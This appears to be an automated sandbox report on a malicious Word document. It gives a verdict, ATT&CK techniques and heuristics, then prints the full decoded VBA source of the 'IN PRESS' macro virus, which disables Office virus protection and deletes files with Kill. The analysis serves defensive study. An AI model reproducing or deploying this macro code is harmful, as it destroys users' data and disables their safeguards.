Verdict: MALICIOUS
Risk Score: 80
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1490 Inhibit System Recovery
The sample contains a VBA macro that attempts to disable macro protection and delete files using `Kill("*.*")`. The macro also displays messages to the user, claiming to be a virus named 'IN PRESS'. This behavior indicates a destructive intent, aiming to cause data loss and disrupt the user's system.
Heuristics 2
- VBA macros detected (medium, 1 related finding): OLE_VBA_MACROS. Document contains VBA macro code.
- VBA macro-virus self-replication / AV tampering (critical): OLE_VBA_MACRO_VIRUS_REPLICATION. VBA macro programmatically rewrites VBA project code through the VBE object model (CodeModule/VBComponents InsertLines/DeleteLines/AddFromString or OrganizerCopy) to copy itself into the global template and other open documents, and/or disables Office macro-virus protection (Options.VirusProtection = False). This is the defining behavior of the W97M document macro-virus family: self-replicating code with no benign document use, independent of any AV signature. Matched line in script: `Options.VirusProtection = False`
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 1898 bytes |

SHA-256: 7f7eb68e0d8f6e58b16dfe181eece9f1ef31238fb83e989e4e39124822a21881
Preview script (first 1,000 lines of the extracted script):
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Name = "INPress"
Sub FilePrint()
WordBasic.DisableAutoMacros 0
Options.VirusProtection = False
Options.SaveNormalPrompt = False
Application.EnableCancelKey = wdCancelDisabled
On Errore GoTo ErrorFS
adoc = Dir("*.*")
While adoc <> ""
Kill (adoc)
MsgBox "' " + adoc + " ' has been erased !", vbInformation, "IN PRESS"
adoc = Dir()
Wend
Assistant.Visible = True
With Assistant.NewBalloon
.Button = msoButtonSetOK
.Heading = "Virus IN PRESS"
.Text = "Ooops ! I have erased your documents .. I have to quit now . Bye bye and sweet dreams !!!"
.Show
End With
Application.Quit
ErrorFS:
End Sub
Sub ToolsMacro()
Application.EnableCancelKey = wdCancelDisabled
WordBasic.DisableAutoMacros 0
Options.VirusProtection = False
Options.SaveNormalPrompt = False
On Error GoTo ErrorTM
MsgBox "Sorry but you have been infected by IN PRESS !", vbInformation, "IN PRESS"
ErrorTM:
End Sub
Sub ViewVBCode()
Application.EnableCancelKey = wdCancelDisabled
WordBasic.DisableAutoMacros 0
Options.VirusProtection = False
Options.SaveNormalPrompt = False
On Error GoTo ErrorVVBC
Assistant.Visible = True
With Assistant.NewBalloon
.Button = msoButtonSetOK
.Heading = "Virus IN PRESS"
.Text = "Why did you want to see my source ? You have done a bad thing !!"
.Show
End With
Kill "\*.*"
Kill "*.*"
Assistant.Visible = True
With Assistant.NewBalloon
.Button = msoButtonSetOK
.Heading = "Virus IN PRESS"
.Text = "I have erased your files to punish your!"
.Show
End With
ErrorVVBC:
End Sub